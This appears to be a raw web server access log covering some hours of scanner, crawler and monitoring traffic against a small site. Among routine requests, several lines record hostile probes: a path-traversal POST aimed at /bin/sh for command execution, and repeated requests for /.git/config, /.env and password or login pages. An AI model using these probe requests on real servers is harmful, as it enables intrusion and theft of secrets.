178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
141.98.11.79 - - [03/Oct/2024:04:50:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
24.197.48.138 - - [03/Oct/2024:04:52:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
149.50.103.48 - - [03/Oct/2024:04:52:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.211.190 - - [03/Oct/2024:04:55:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [03/Oct/2024:04:55:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:04:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:05:03:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:05:08:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [03/Oct/2024:05:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [03/Oct/2024:05:12:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [03/Oct/2024:05:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:15:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.203.211.24 - - [03/Oct/2024:05:16:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.211.139.188 - - [03/Oct/2024:05:17:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.175.120.105 - - [03/Oct/2024:05:19:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:21:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:05:22:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:24:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [03/Oct/2024:05:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:26:42 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.211.139.188 - - [03/Oct/2024:05:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:05:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:05:29:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:31:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:33:46 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
149.50.103.48 - - [03/Oct/2024:05:34:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
34.76.178.141 - - [03/Oct/2024:05:34:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
35.195.29.134 - - [03/Oct/2024:05:34:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
178.211.139.188 - - [03/Oct/2024:05:35:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.175.120.105 - - [03/Oct/2024:05:38:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [03/Oct/2024:05:38:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)"
178.211.139.188 - - [03/Oct/2024:05:39:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [03/Oct/2024:05:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.240.48.218 - - [03/Oct/2024:05:39:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
18.175.120.105 - - [03/Oct/2024:05:40:42 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:05:45:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:05:45:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:45:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [03/Oct/2024:05:47:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:48:20 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:05:51:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:52:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:54:07 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:05:55:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [03/Oct/2024:05:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:05:56:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:57:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:05:59:20 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
87.120.113.238 - - [03/Oct/2024:06:00:22 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7"
104.248.229.49 - - [03/Oct/2024:06:00:33 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
104.248.229.49 - - [03/Oct/2024:06:00:36 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
104.248.229.49 - - [03/Oct/2024:06:00:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
87.120.113.238 - - [03/Oct/2024:06:01:05 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; LG-H930) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.238 - - [03/Oct/2024:06:01:05 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "msnbot/1.0 ( http://search.msn.com/msnbot.htm)"
87.120.113.238 - - [03/Oct/2024:06:01:09 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
87.120.113.238 - - [03/Oct/2024:06:01:11 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
68.183.17.85 - - [03/Oct/2024:06:01:23 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
45.156.129.56 - - [03/Oct/2024:06:01:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
18.175.120.105 - - [03/Oct/2024:06:02:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.93 - - [03/Oct/2024:06:03:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
18.175.120.105 - - [03/Oct/2024:06:04:41 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.211.139.188 - - [03/Oct/2024:06:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
157.173.122.176 - - [03/Oct/2024:06:04:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
178.211.139.188 - - [03/Oct/2024:06:06:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.175.120.105 - - [03/Oct/2024:06:08:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:06:13:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.228 - - [03/Oct/2024:06:14:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.228 - - [03/Oct/2024:06:14:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:06:15:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
149.50.103.48 - - [03/Oct/2024:06:15:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:06:20:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:20:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:06:22:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.141.120.37 - - [03/Oct/2024:06:22:52 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:22:52 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
185.191.126.213 - - [03/Oct/2024:06:23:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.141.120.37 - - [03/Oct/2024:06:23:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:23:04 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:23:17 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:23:17 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
95.214.55.43 - - [03/Oct/2024:06:23:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.141.120.37 - - [03/Oct/2024:06:23:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:23:34 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:24:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:24:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:24:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:24:34 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
185.191.126.213 - - [03/Oct/2024:06:24:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.121 - - [03/Oct/2024:06:24:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.121 - - [03/Oct/2024:06:24:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.141.120.37 - - [03/Oct/2024:06:24:51 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:24:51 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:25:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.26.0"
94.141.120.37 - - [03/Oct/2024:06:25:13 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
185.191.126.213 - - [03/Oct/2024:06:25:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.121 - - [03/Oct/2024:06:29:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.121 - - [03/Oct/2024:06:30:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.121 - - [03/Oct/2024:06:30:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.121 - - [03/Oct/2024:06:30:06 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
178.211.139.188 - - [03/Oct/2024:06:31:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.213.187.244 - - [03/Oct/2024:06:35:59 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
185.191.126.213 - - [03/Oct/2024:06:38:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:06:38:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
71.6.199.23 - - [03/Oct/2024:06:38:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.199.23 - - [03/Oct/2024:06:38:52 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
71.6.199.23 - - [03/Oct/2024:06:38:52 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
71.6.199.23 - - [03/Oct/2024:06:38:52 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
71.6.199.23 - - [03/Oct/2024:06:38:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
185.191.126.213 - - [03/Oct/2024:06:39:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:06:39:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [03/Oct/2024:06:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [03/Oct/2024:06:44:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.129.56 - - [03/Oct/2024:06:45:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.79.181.223 - - [03/Oct/2024:06:47:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:06:47:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:48:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.84.89.2 - - [03/Oct/2024:06:48:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
172.105.128.12 - - [03/Oct/2024:06:49:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:06:50:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:51:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:53:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:06:53:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [03/Oct/2024:06:53:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:06:55:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:06:57:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.84.89.2 - - [03/Oct/2024:06:59:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
18.175.120.105 - - [03/Oct/2024:07:00:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
45.84.89.2 - - [03/Oct/2024:07:00:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
185.191.126.213 - - [03/Oct/2024:07:00:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.187.244 - - [03/Oct/2024:07:01:07 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
149.50.103.48 - - [03/Oct/2024:07:01:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:07:01:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:07:02:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:07:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.118 - - [03/Oct/2024:07:04:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [03/Oct/2024:07:05:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.118 - - [03/Oct/2024:07:07:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.175.120.105 - - [03/Oct/2024:07:08:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.84.89.2 - - [03/Oct/2024:07:08:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
185.16.39.118 - - [03/Oct/2024:07:09:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:07:10:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:07:11:06 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:07:12:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:13:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:14:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:14:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:07:15:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.58 - - [03/Oct/2024:07:16:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Oct/2024:07:16:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:17:03 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:07:17:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:18:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:19:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:20:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:21:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.43 - - [03/Oct/2024:07:21:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:07:21:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:22:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:07:23:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:07:23:21 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:07:23:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:07:24:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
